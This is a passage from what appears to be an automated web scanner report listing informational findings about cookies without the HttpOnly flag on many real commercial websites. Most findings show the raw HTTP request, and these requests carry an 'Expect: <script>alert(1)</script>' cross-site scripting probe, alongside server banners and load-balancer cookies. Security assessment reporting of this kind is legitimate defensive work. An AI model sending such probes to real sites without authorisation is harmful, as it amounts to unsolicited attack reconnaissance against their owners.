The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blazerforum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 PHP/5.2.6
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerAFUWEB_www_pool=1106972844.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.119. http://www.bloodhero.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloodhero.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bloodhero.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:24 GMT
Content-Length: 1245
Set-Cookie: LB-Persist=fNseG2JLIN1fvRsfq0RBYKAdAX8wCR1ZAd6EE44jW6VtnYlF0SkFNygUjMzdXzKRZOl834Xc69W6zng=; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

17.120. http://www.bridgestonetire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridgestonetire.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bridgestonetire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:31:12 GMT
Content-Length: 1245
Set-Cookie: Coyote-2-a320121=a320137:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

17.121. http://www.cosmeticscop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cosmeticscop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=86192b3f-96a1-4c58-aae6-ace34af4c08a; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ak5g2p55u4jtmvbge5by5sfw; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Content-Length: 1295


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link rel=
...[SNIP]...

17.122. http://www.course.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.course.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.course.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:07:04 GMT
Set-Cookie: course=1335205898.20480.0000; path=/


17.123. http://www.creditscorecomplete.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditscorecomplete.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.creditscorecomplete.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:54:24 GMT
Set-Cookie: NSC_iuuq_xxxdsfejutdpsfdpnqmfuf=ffffffff0909330b45525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 00:56:25 GMT;path=/
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

17.124. http://www.dirtrider.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dirtrider.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dirtrider.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=egt43x45tiwnren54mtoic55; path=/; HttpOnly
Set-Cookie: UserPuid=2331437118715581986; domain=dirtrider.com; expires=Mon, 02-May-2061 00:20:09 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 43

GIF89a.......|.8...!.......,...........D..;

17.125. http://www.docufide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docufide.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docufide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:30:40 GMT
Server: docufide webserver
Content-Length: 455
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: LB-cookie-20480-prodweblb tomcat=AKODKIMAFAAA; Expires=Mon, 02-May-2011 03:29:58 GMT; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.126. http://www.ebuilders.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebuilders.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebuilders.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.ebuilders.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rzzmwgjp001tep55x2ukkrjl; path=/; HttpOnly
Set-Cookie: PSGUID=5594d226-e5be-4106-b3b3-b1e542925e6f; expires=Wed, 01-Jun-2011 00:25:47 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90B
P3P: CP="CAO PSA OUR"
Date: Mon, 02 May 2011 00:25:46 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-1=2483174410.20480.0000; path=/


17.127. http://www.eiprofile.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eiprofile.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eiprofile.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: LinkTrust
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:24:21 GMT
Set-Cookie: BIGipServerhttp_pool=168106924.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

17.128. http://www.floridamoves.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridamoves.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.floridamoves.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: floridamoves.com=R1517074728; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:16:40 GMT


17.129. http://www.foxytube.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxytube.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foxytube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:26:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 508
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: RNLBSERVERID=ded692; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.130. http://www.girlscoutshop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlscoutshop.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.girlscoutshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:12:17 GMT
Set-Cookie: Tagalongs=riO5PsabbXwW/jmNvdrCAAyuQhFbkSqprTgGgcTwFatwy+hDa+sjuREUHMnEPSREah6HH9fj19J6Iw==; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

17.131. http://www.gohawaii.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gohawaii.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gohawaii.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=XKQRVMS192.168.10.48CKMLW; path=/
Date: Sun, 01 May 2011 23:49:22 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 472
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.132. http://www.greenhulk.net/forums/archive/index.php/t-126285.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/archive/index.php/t-126285.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/archive/index.php/t-126285.html HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:03:16 GMT
Server: Apache
Set-Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; path=/; domain=.greenhulk.net; HttpOnly
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:03:16 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step&s=95336a5715caddfe645c46b8976e18eb
Expires: Mon, 02 May 2011 02:03:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0


17.133. http://www.greenhulk.net/forums/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...

17.134. http://www.greenhulk.net/forums/register.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...

17.135. http://www.illinoishomepage.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.illinoishomepage.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.illinoishomepage.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:51:13 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerDallasPool=362156042.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.136. http://www.innerstaru.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.innerstaru.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.innerstaru.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 160
Content-Type: text/html
Location: http://web.innerstaru.com/favicon.ico
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:25:46 GMT
Set-Cookie: NSC_Cbscjf_Xfcgbsn=440af0ab3660;expires=Mon, 02-May-11 00:28:17 GMT;path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://web.innerstaru.com/favicon.ico">here</a></body>

17.137. http://www.inthecompanyofdogs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inthecompanyofdogs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inthecompanyofdogs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:51:14 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: balance=2M1ypXByvVJuGHDAJvHKqcVFSE/syX008woxPohsNZA4Gq0FJM7p07+zV+a3u/rRuIvzJkQeVTGYyg==; path=/


17.138. http://www.kasperskylabs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kasperskylabs.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kasperskylabs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.54
Date: Sun, 01 May 2011 23:49:23 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://www.kaspersky.com/favicon.ico
Set-Cookie: uid=AAAAA0298YMIw1W7BP2KAg==; path=/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

17.139. http://www.kucourses.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kucourses.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kucourses.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:10 GMT
Set-Cookie: BIGipServerKAPLAN=252823562.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

17.140. http://www.kylotteryretailers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kylotteryretailers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kylotteryretailers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:35 GMT
Server: IBM_HTTP_Server
Vary: Accept-Encoding
Content-Length: 476
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a010362=a010302:0;Domain=kylotteryretailers.com;Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

17.141. http://www.libertytax.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.libertytax.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.libertytax.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Mon, 02 May 2011 00:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.libertytax.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=0621ba46-67a6-42c2-b166-b97cb6c7d237; expires=Wed, 02-May-2012 00:57:12 GMT; path=/
Set-Cookie: EkAnalytics=0; expires=Wed, 02-May-2012 00:57:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hmhpti2mdueiki45l3cinf45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3375


<!DOCTYPE html>
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>
